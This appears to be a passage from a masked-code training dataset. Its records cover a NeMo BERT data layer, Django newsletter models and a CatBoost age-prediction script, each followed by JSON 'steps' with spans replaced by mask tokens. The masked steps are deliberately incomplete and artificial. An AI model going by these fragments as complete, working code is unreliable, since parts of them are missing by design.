def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (
1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):
AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':
NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),
'output_ids': NeuralType({(0): AxisType(BatchTag), (1):
AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(
BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):
AxisType(BatchTag)})}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
from nemo.backends.pytorch.nm import DataLayerNM
from nemo.core.neural_types import *
from nemo.core import DeviceType
import torch
from .datasets import BertPretrainingDataset
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (
1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):
AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':
NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),
'output_ids': NeuralType({(0): AxisType(BatchTag), (1):
AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(
BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):
AxisType(BatchTag)})}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
# Copyright (c) 2019 NVIDIA Corporation
from nemo.backends.pytorch.nm import DataLayerNM
from nemo.core.neural_types import *
from nemo.core import DeviceType
import torch
from .datasets import BertPretrainingDataset
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {
"input_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_type_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"labels":
NeuralType({0: AxisType(BatchTag)}),
}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15,
**kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device(
"cuda" if self.placement in [DeviceType.GPU, DeviceType.AllGpu]
else "cpu"
)
self._dataset = BertPretrainingDataset(
tokenizer=tokenizer,
dataset=dataset,
name=name,
sentence_indices_filename=sentence_indices_filename,
max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
|
flexible
|
{
"blob_id": "a47ffd5df49ec627442a491f81a117b3e68ff50b",
"index": 2326,
"step-1": "<mask token>\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n <mask token>\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n <mask token>\n\n @property\n def data_iterator(self):\n return None\n",
"step-2": "<mask token>\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n <mask token>\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-3": "<mask token>\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n\n @staticmethod\n def create_ports():\n input_ports = {}\n output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (\n 1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):\n AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':\n NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),\n 'output_ids': NeuralType({(0): AxisType(BatchTag), (1):\n AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(\n BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):\n AxisType(BatchTag)})}\n return input_ports, output_ports\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-4": "from nemo.backends.pytorch.nm import DataLayerNM\nfrom nemo.core.neural_types import *\nfrom nemo.core import DeviceType\nimport torch\nfrom .datasets import BertPretrainingDataset\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n\n @staticmethod\n def create_ports():\n input_ports = {}\n output_ports = {'input_ids': NeuralType({(0): AxisType(BatchTag), (\n 1): AxisType(TimeTag)}), 'input_type_ids': NeuralType({(0):\n AxisType(BatchTag), (1): AxisType(TimeTag)}), 'input_mask':\n NeuralType({(0): AxisType(BatchTag), (1): AxisType(TimeTag)}),\n 'output_ids': NeuralType({(0): AxisType(BatchTag), (1):\n AxisType(TimeTag)}), 'output_mask': NeuralType({(0): AxisType(\n BatchTag), (1): AxisType(TimeTag)}), 'labels': NeuralType({(0):\n AxisType(BatchTag)})}\n return input_ports, output_ports\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15, **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n self._device = torch.device('cuda' if self.placement in [DeviceType\n .GPU, DeviceType.AllGpu] else 'cpu')\n self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset\n =dataset, name=name, sentence_indices_filename=\n sentence_indices_filename, max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-5": "# Copyright (c) 2019 NVIDIA Corporation\n\nfrom nemo.backends.pytorch.nm import DataLayerNM\nfrom nemo.core.neural_types import *\nfrom nemo.core import DeviceType\nimport torch\nfrom .datasets import BertPretrainingDataset\n\n\nclass BertPretrainingDataLayer(DataLayerNM):\n @staticmethod\n def create_ports():\n input_ports = {}\n output_ports = {\n \"input_ids\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"input_type_ids\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"input_mask\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"output_ids\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"output_mask\":\n NeuralType({\n 0: AxisType(BatchTag),\n 1: AxisType(TimeTag)\n }),\n \"labels\":\n NeuralType({0: AxisType(BatchTag)}),\n }\n\n return input_ports, output_ports\n\n def __init__(self, *, tokenizer, dataset, name, max_seq_length,\n sentence_indices_filename=None, mask_probability=0.15,\n **kwargs):\n DataLayerNM.__init__(self, **kwargs)\n\n self._device = torch.device(\n \"cuda\" if self.placement in [DeviceType.GPU, DeviceType.AllGpu]\n else \"cpu\"\n )\n\n self._dataset = BertPretrainingDataset(\n tokenizer=tokenizer,\n dataset=dataset,\n name=name,\n sentence_indices_filename=sentence_indices_filename,\n max_length=max_seq_length,\n mask_probability=mask_probability)\n\n def __len__(self):\n return len(self._dataset)\n\n @property\n def dataset(self):\n return self._dataset\n\n @property\n def data_iterator(self):\n return None\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.utils.text import slugify
from pyexpat import model
from django.db import models
# Create your models here.
from rest_framework_simplejwt.state import User
FREQUENCY = (
('daily', 'Diario'),
('weekly', 'Semanal'),
('monthly', 'Mensual')
)
class Tags(models.Model):
name = models.CharField(max_length=100)
slug = models.CharField(max_length=150)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
def save(self, *arg, **kwargs):
if not self.slug:
self.slug = slugify(self.name)
super(Tags, self).save(*arg, **kwargs)
class Meta:
ordering = ('-created_at',)
class Newsletter(models.Model):
name = models.CharField(max_length=200)
description = models.CharField(max_length=10000)
image = models.ImageField()
target = models.IntegerField()
frequency = models.CharField(max_length=10, choices=FREQUENCY, default='monthly')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
tag = models.ManyToManyField(Tags)
@property
def subscribed(self):
return 10
def __str__(self):
return self.name
class Meta:
ordering = ('-created_at',)
|
normal
|
{
"blob_id": "71503282e58f60e0936a5236edc094f1da937422",
"index": 6565,
"step-1": "<mask token>\n\n\nclass Tags(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-2": "<mask token>\n\n\nclass Tags(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-3": "<mask token>\n\n\nclass Tags(models.Model):\n name = models.CharField(max_length=100)\n slug = models.CharField(max_length=150)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-4": "from django.utils.text import slugify\nfrom pyexpat import model\nfrom django.db import models\nfrom rest_framework_simplejwt.state import User\nFREQUENCY = ('daily', 'Diario'), ('weekly', 'Semanal'), ('monthly', 'Mensual')\n\n\nclass Tags(models.Model):\n name = models.CharField(max_length=100)\n slug = models.CharField(max_length=150)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-5": "from django.utils.text import slugify\nfrom pyexpat import model\nfrom django.db import models\n# Create your models here.\nfrom rest_framework_simplejwt.state import User\n\nFREQUENCY = (\n ('daily', 'Diario'),\n ('weekly', 'Semanal'),\n ('monthly', 'Mensual')\n)\n\nclass Tags(models.Model):\n name = models.CharField(max_length=100)\n slug = models.CharField(max_length=150)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n class Meta:\n ordering = ('-created_at',)\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default='monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering = ('-created_at',)\n\n",
"step-ids": [
5,
7,
8,
10,
11
]
}
|
[
5,
7,
8,
10,
11
] |
from typing import List
import pandas as pd
import numpy as np
import pickle
from catboost import CatBoostRegressor
from sklearn.preprocessing import MinMaxScaler
def calculate_probable_age(usersEducationFeatures):
prob_age = {}
grads_count = {}
age_diff1 = 17 # age difference for school
age_diff2 = 22 # age difference for university
for index in usersEducationFeatures.index:
count = 0
skip = False
if not pd.isnull(usersEducationFeatures.at[index, "school_education"]):
prob_age[usersEducationFeatures.at[index, "uid"]] = (
2021 + age_diff1 - usersEducationFeatures.at[index, "school_education"]
)
skip = True
for i in range(1, 8):
if skip:
break
if not pd.isnull(usersEducationFeatures.at[index, f"graduation_{i}"]):
prob_age[usersEducationFeatures.at[index, "uid"]] = (
2021 + age_diff2 - usersEducationFeatures.at[index, f"graduation_{i}"]
)
skip = True
if not pd.isnull(usersEducationFeatures.at[index, "school_education"]):
count += 1
for i in range(1, 8):
if not pd.isnull(usersEducationFeatures.at[index, f"graduation_{i}"]):
count += 1
grads_count[usersEducationFeatures.at[index, "uid"]] = count
return prob_age, grads_count
def get_prob_age(uids, prob_age) -> List[int]:
res = [0] * len(uids)
for i, uid in enumerate(uids):
res[i] = prob_age.setdefault(uid, 0)
return res
def get_grads_count(uids, grads_count) -> List[int]:
res = [0] * len(uids)
for i, uid in enumerate(uids):
res[i] = grads_count.setdefault(uid, 0)
return res
def get_groups_count(uids, usersGroups):
tmp = usersGroups.groupby("uid").count()
groups_count = [0] * len(uids)
for i, uid in enumerate(uids):
try:
groups_count[i] = tmp.at[uid, "gid"]
except:
continue
return groups_count
def get_mean_and_median_group(uids, gid2age, uid_groups):
mean_group = [0.0] * len(uids)
median_group = [0.0] * len(uids)
for i, uid in enumerate(uids):
try:
tmp = [gid2age[x] for x in uid_groups[uid]]
mean_group[i] = sum(tmp) / len(tmp)
median_group[i] = np.median(tmp)
except:
continue
return mean_group, median_group
def get_mean_and_median_friends(uids, uid2age, uid_friends):
mean_friends = [0.0] * len(uids)
median_friends = [0.0] * len(uids)
mean_friends2 = [0.0] * len(uids)
for i, uid in enumerate(uids):
try:
tmp = []
if uid in uid_friends and len(uid_friends[uid]) < 42:
for friend in uid_friends[uid]:
if friend in uid_friends:
for f2 in uid_friends[friend]:
if f2 != uid and f2 in uid2age:
tmp.append(uid2age[f2])
mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0
tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]
mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0
median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0
except:
continue
return mean_friends, median_friends, mean_friends2
def main():
with open("gid2age.pkl", "rb") as fin:
gid2age = pickle.load(fin)
with open("uid2age.pkl", "rb") as fin:
uid2age = pickle.load(fin)
with open("uid_friends.pkl", "rb") as fin:
uid_friends = pickle.load(fin)
with open("scaler.pkl", "rb") as fin:
scaler = pickle.load(fin)
model = CatBoostRegressor()
model.load_model("model")
test = pd.read_csv("/tmp/data/test.csv")
testEducationFeatures = pd.read_csv("/tmp/data/testEducationFeatures.csv")
testGroups = pd.read_csv("/tmp/data/testGroups.csv")
test["cfriends"] = 0
for index in test.index:
uid = test.at[index, "uid"]
if uid in uid_friends:
test.at[index, "cfriends"] = len(uid_friends[uid])
else:
test.at[index, "cfriends"] = 0
prob_age, grads_count = calculate_probable_age(testEducationFeatures)
test["prob_age"] = get_prob_age(test.uid, prob_age)
test["grads_count"] = get_grads_count(test.uid, grads_count)
test["groups_count"] = get_groups_count(test.uid, testGroups)
uid_groups = {}
for index in testGroups.index:
uid = testGroups.at[index, "uid"]
uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[index, "gid"]]
test["mean_group_age"], test["median_group_age"] = get_mean_and_median_group(test.uid, gid2age, uid_groups)
test["mean_friends_age"], test["median_friends_age"], test["mean_friends2_age"] = get_mean_and_median_friends(
test.uid, uid2age, uid_friends
)
test["is_prob_age"] = test.prob_age != 0
test["is_group_age"] = test.mean_group_age != 0
test["is_friends_age"] = test.mean_friends_age != 0
X_test = scaler.transform(test.drop(["uid"], axis=1))
y_pred = model.predict(X_test)
res = pd.DataFrame({"uid": test.uid, "age": y_pred})
res.to_csv("/var/log/result", header=True, index=False)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "ee0ed255b6851696dc57c01100cd67f5f959cf01",
"index": 7437,
"step-1": "<mask token>\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = [0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = [0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\ndef main():\n with open('gid2age.pkl', 'rb') as fin:\n gid2age = pickle.load(fin)\n with open('uid2age.pkl', 'rb') as fin:\n uid2age = pickle.load(fin)\n with open('uid_friends.pkl', 'rb') as fin:\n uid_friends = pickle.load(fin)\n with open('scaler.pkl', 'rb') as fin:\n scaler = 
pickle.load(fin)\n model = CatBoostRegressor()\n model.load_model('model')\n test = pd.read_csv('/tmp/data/test.csv')\n testEducationFeatures = pd.read_csv('/tmp/data/testEducationFeatures.csv')\n testGroups = pd.read_csv('/tmp/data/testGroups.csv')\n test['cfriends'] = 0\n for index in test.index:\n uid = test.at[index, 'uid']\n if uid in uid_friends:\n test.at[index, 'cfriends'] = len(uid_friends[uid])\n else:\n test.at[index, 'cfriends'] = 0\n prob_age, grads_count = calculate_probable_age(testEducationFeatures)\n test['prob_age'] = get_prob_age(test.uid, prob_age)\n test['grads_count'] = get_grads_count(test.uid, grads_count)\n test['groups_count'] = get_groups_count(test.uid, testGroups)\n uid_groups = {}\n for index in testGroups.index:\n uid = testGroups.at[index, 'uid']\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[\n index, 'gid']]\n test['mean_group_age'], test['median_group_age'\n ] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\n test['mean_friends_age'], test['median_friends_age'], test[\n 'mean_friends2_age'] = get_mean_and_median_friends(test.uid,\n uid2age, uid_friends)\n test['is_prob_age'] = test.prob_age != 0\n test['is_group_age'] = test.mean_group_age != 0\n test['is_friends_age'] = test.mean_friends_age != 0\n X_test = scaler.transform(test.drop(['uid'], axis=1))\n y_pred = model.predict(X_test)\n res = pd.DataFrame({'uid': test.uid, 'age': y_pred})\n res.to_csv('/var/log/result', header=True, index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef calculate_probable_age(usersEducationFeatures):\n prob_age = {}\n grads_count = {}\n age_diff1 = 17\n age_diff2 = 22\n for index in usersEducationFeatures.index:\n count = 0\n skip = False\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff1 - usersEducationFeatures.at[index,\n 'school_education']\n skip = True\n for i in range(1, 8):\n if skip:\n break\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff2 - usersEducationFeatures.at[index,\n f'graduation_{i}']\n skip = True\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n count += 1\n for i in range(1, 8):\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n count += 1\n grads_count[usersEducationFeatures.at[index, 'uid']] = count\n return prob_age, grads_count\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = 
[0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\ndef main():\n with open('gid2age.pkl', 'rb') as fin:\n gid2age = pickle.load(fin)\n with open('uid2age.pkl', 'rb') as fin:\n uid2age = pickle.load(fin)\n with open('uid_friends.pkl', 'rb') as fin:\n uid_friends = pickle.load(fin)\n with open('scaler.pkl', 'rb') as fin:\n scaler = pickle.load(fin)\n model = CatBoostRegressor()\n model.load_model('model')\n test = pd.read_csv('/tmp/data/test.csv')\n testEducationFeatures = pd.read_csv('/tmp/data/testEducationFeatures.csv')\n testGroups = pd.read_csv('/tmp/data/testGroups.csv')\n test['cfriends'] = 0\n for index in test.index:\n uid = test.at[index, 'uid']\n if uid in uid_friends:\n test.at[index, 'cfriends'] = len(uid_friends[uid])\n else:\n test.at[index, 'cfriends'] = 0\n prob_age, grads_count = calculate_probable_age(testEducationFeatures)\n test['prob_age'] = get_prob_age(test.uid, prob_age)\n test['grads_count'] = get_grads_count(test.uid, grads_count)\n test['groups_count'] = get_groups_count(test.uid, testGroups)\n uid_groups = {}\n for index in testGroups.index:\n uid = testGroups.at[index, 'uid']\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[\n index, 'gid']]\n test['mean_group_age'], test['median_group_age'\n ] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\n test['mean_friends_age'], 
